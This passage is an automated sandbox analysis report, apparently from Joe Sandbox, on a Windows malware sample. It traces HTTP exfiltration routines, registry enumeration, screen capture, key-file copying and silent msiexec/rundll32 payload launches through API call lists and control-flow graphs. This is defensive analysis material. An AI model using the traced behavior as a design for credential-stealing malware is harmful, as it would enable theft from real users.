                                                                                                control_flow_graph 1956 4048d0-404992 call 41aab0 call 404800 call 41aa50 * 5 InternetOpenA StrCmpCA 1971 404994 1956->1971 1972 40499b-40499f 1956->1972 1971->1972 1973 4049a5-404b1d call 418cf0 call 41ac30 call 41abb0 call 41ab10 * 2 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41ac30 call 41abb0 call 41ab10 * 2 InternetConnectA 1972->1973 1974 404f1b-404f43 InternetCloseHandle call 41ade0 call 40a210 1972->1974 1973->1974 2060 404b23-404b27 1973->2060 1984 404f82-404ff2 call 418b20 * 2 call 41aab0 call 41ab10 * 8 1974->1984 1985 404f45-404f7d call 41ab30 call 41acc0 call 41abb0 call 41ab10 1974->1985 1985->1984 2061 404b35 2060->2061 2062 404b29-404b33 2060->2062 2063 404b3f-404b72 HttpOpenRequestA 2061->2063 2062->2063 2064 404b78-404e78 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41acc0 call 41abb0 call 41ab10 call 41ac30 call 41abb0 call 41ab10 call 41aa50 call 41ac30 * 2 call 41abb0 call 41ab10 * 2 call 41ade0 lstrlenA call 41ade0 * 2 lstrlenA call 41ade0 HttpSendRequestA 2063->2064 2065 404f0e-404f15 InternetCloseHandle 2063->2065 2176 404e82-404eac InternetReadFile 2064->2176 2065->1974 2177 404eb7-404f09 InternetCloseHandle call 41ab10 2176->2177 2178 404eae-404eb5 2176->2178 2177->2065 2178->2177 2179 404eb9-404ef7 call 41acc0 call 41abb0 call 41ab10 2178->2179 2179->2176
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                  • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                                                                                  • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                                                                                  • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                                                                                  • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                                                                  • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404965
                                                                                                • StrCmpCA.SHLWAPI(?,00976668), ref: 0040498A
                                                                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404B0A
                                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDE,00000000,?,?,00000000,?,",00000000,?,00976618), ref: 00404E38
                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E54
                                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E68
                                                                                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E99
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00404EFD
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00404F15
                                                                                                • HttpOpenRequestA.WININET(00000000,00976678,?,00975EE8,00000000,00000000,00400100,00000000), ref: 00404B65
                                                                                                  • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                  • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                  • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                  • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                  • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                  • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00404F1F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                                • String ID: "$"$------$------$------
                                                                                                • API String ID: 2402878923-2180234286
                                                                                                • Opcode ID: 24e5b9ffbbd8da79dd9e114d0f79b3235ad9c1885af58660c4bb17f1c1353680
                                                                                                • Instruction ID: 9047d27655e640063cf5e546897bb6ee72beef818384a457e6eae52f2661673c
                                                                                                • Opcode Fuzzy Hash: 24e5b9ffbbd8da79dd9e114d0f79b3235ad9c1885af58660c4bb17f1c1353680
                                                                                                • Instruction Fuzzy Hash: 41121072A121189ACB14EB91DD66FEEB379AF14314F50419EF10662091EF383F98CF69

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2188 4062d0-40635b call 41aab0 call 404800 call 41aa50 InternetOpenA StrCmpCA 2195 406364-406368 2188->2195 2196 40635d 2188->2196 2197 406559-406575 call 41aab0 call 41ab10 * 2 2195->2197 2198 40636e-406392 InternetConnectA 2195->2198 2196->2195 2216 406578-40657d 2197->2216 2199 406398-40639c 2198->2199 2200 40654f-406553 InternetCloseHandle 2198->2200 2202 4063aa 2199->2202 2203 40639e-4063a8 2199->2203 2200->2197 2206 4063b4-4063e2 HttpOpenRequestA 2202->2206 2203->2206 2208 406545-406549 InternetCloseHandle 2206->2208 2209 4063e8-4063ec 2206->2209 2208->2200 2211 406415-406455 HttpSendRequestA HttpQueryInfoA 2209->2211 2212 4063ee-40640f InternetSetOptionA 2209->2212 2214 406457-406477 call 41aa50 call 41ab10 * 2 2211->2214 2215 40647c-40649b call 418ad0 2211->2215 2212->2211 2214->2216 2222 406519-406539 call 41aa50 call 41ab10 * 2 2215->2222 2223 40649d-4064a4 2215->2223 2222->2216 2226 4064a6-4064d0 InternetReadFile 2223->2226 2227 406517-40653f InternetCloseHandle 2223->2227 2231 4064d2-4064d9 2226->2231 2232 4064db 2226->2232 2227->2208 2231->2232 2235 4064dd-406515 call 41acc0 call 41abb0 call 41ab10 2231->2235 2232->2227 2235->2226
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                  • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                                                                                  • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                                                                                  • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                                                                                  • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                                                                  • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                • InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
                                                                                                • StrCmpCA.SHLWAPI(?,00976668), ref: 00406353
                                                                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                                                                                • HttpOpenRequestA.WININET(00000000,GET,?,00975EE8,00000000,00000000,00400100,00000000), ref: 004063D5
                                                                                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                                                                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0040644D
                                                                                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004064BD
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040653F
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00406549
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00406553
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                                • String ID: ERROR$ERROR$FUA$GET
                                                                                                • API String ID: 3074848878-1334267432
                                                                                                • Opcode ID: 8d2052ce6f56b34130f4bdb03eeee54b52a8e56d11ced9f3fa7599497f7be0a6
                                                                                                • Instruction ID: e13f8b4f5a4983f25bfc964ce73e77e76ffbf3c7ad5d81db2c216f4c68459c1c
                                                                                                • Opcode Fuzzy Hash: 8d2052ce6f56b34130f4bdb03eeee54b52a8e56d11ced9f3fa7599497f7be0a6
                                                                                                • Instruction Fuzzy Hash: 33718171A00218ABDB14DF90DC59FEEB775AF44304F1081AAF6067B1D4DBB86A84CF59
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                • RegOpenKeyExA.KERNEL32(00000000,0096F1F8,00000000,00020019,00000000,004205BE), ref: 00418534
                                                                                                • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
                                                                                                • wsprintfA.USER32 ref: 004185E9
                                                                                                • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041860B
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0041861C
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00418629
                                                                                                  • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                                                                • String ID: - $%s\%s$?
                                                                                                • API String ID: 3246050789-3278919252
                                                                                                • Opcode ID: 548ba1065ab83f03c9bd26c1ca00f567c20da7874d0830e03175ae2cfaf9dfac
                                                                                                • Instruction ID: c228fa157c9b2873a9233ab8a396ad333d8a8ae6667b392d6015aff843962e7d
                                                                                                • Opcode Fuzzy Hash: 548ba1065ab83f03c9bd26c1ca00f567c20da7874d0830e03175ae2cfaf9dfac
                                                                                                • Instruction Fuzzy Hash: 47812D71911118ABDB24DB50DD95FEAB7B9BF08314F1082DEE10966180DF746BC8CFA9
                                                                                                APIs
                                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 004191FC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateGlobalStream
                                                                                                • String ID: `dAF$`dAF$image/jpeg
                                                                                                • API String ID: 2244384528-2462684518
                                                                                                • Opcode ID: e2818ee80e84ba607554f161cf3f8b5aa4b01b2fddcad8d08d404cdb47dfdd2d
                                                                                                • Instruction ID: 5957f6d1424668cbfb95915d93d24f68315a2265fb4ab52f55d04562dbc5d918
                                                                                                • Opcode Fuzzy Hash: e2818ee80e84ba607554f161cf3f8b5aa4b01b2fddcad8d08d404cdb47dfdd2d
                                                                                                • Instruction Fuzzy Hash: BE710E71E11208ABDB14EFE4DC95FEEB779BF48300F10851AF516A7290EB34A944CB65
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,0096C238,?,004210F4,?,00000000), ref: 0041AB3B
                                                                                                  • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415894
                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004158F1
                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415AA7
                                                                                                  • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                  • Part of subcall function 00415440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415478
                                                                                                  • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                  • Part of subcall function 00415510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415568
                                                                                                  • Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 0041557F
                                                                                                  • Part of subcall function 00415510: StrStrA.SHLWAPI(00000000,00000000), ref: 004155B4
                                                                                                  • Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 004155D3
                                                                                                  • Part of subcall function 00415510: strtok.MSVCRT(00000000,?), ref: 004155EE
                                                                                                  • Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 004155FE
                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004159DB
                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415B90
                                                                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415C5C
                                                                                                • Sleep.KERNEL32(0000EA60), ref: 00415C6B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcpylstrlen$Sleepstrtok
                                                                                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                • API String ID: 3630751533-2791005934
                                                                                                • Opcode ID: 68fc1783be157d79b6a74cc1a14f4d38b2ed848e63635327db5cc2a9e1748814
                                                                                                • Instruction ID: 55671caa9f17e02bf2b096751d64d2e50591885947f125be0164830bf8637258
                                                                                                • Opcode Fuzzy Hash: 68fc1783be157d79b6a74cc1a14f4d38b2ed848e63635327db5cc2a9e1748814
                                                                                                • Instruction Fuzzy Hash: 30E1A331A111049BCB14FBA1EDA6EED733EAF54304F40856EF50666091EF386B98CB5A
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 00413415
                                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 004135AD
                                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 0041373A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExecuteShell$lstrcpy
                                                                                                • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                                                                                • API String ID: 2507796910-3625054190
                                                                                                • Opcode ID: 2528a1684b23bf3401f9dbdbc6c17ea6bff926918c481d8853f80c72cb8d5a1d
                                                                                                • Instruction ID: 9b621e5b28039e8226f92625bb5802f9f58bb257d03f06fe20f9cf3dfd15236c
                                                                                                • Opcode Fuzzy Hash: 2528a1684b23bf3401f9dbdbc6c17ea6bff926918c481d8853f80c72cb8d5a1d
                                                                                                • Instruction Fuzzy Hash: 271241719011189ACB14FBA1DDA2FEDB739AF14314F00419FF10666196EF382B99CFA9
                                                                                                APIs
                                                                                                • memset.MSVCRT ref: 00401327
                                                                                                  • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                                                                  • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                                                                  • Part of subcall function 004012A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                                                                  • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                                                                  • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                                                                • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                                                                                • lstrlenA.KERNEL32(?), ref: 0040135C
                                                                                                • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                  • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                  • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                  • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                  • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                  • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00976A20,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                                                                  • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                  • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                                                                                  • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                  • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                                                                                  • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                                                                                  • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                                                                                  • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                                                                                  • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                                                                                  • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                                                                                • memset.MSVCRT ref: 00401516
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
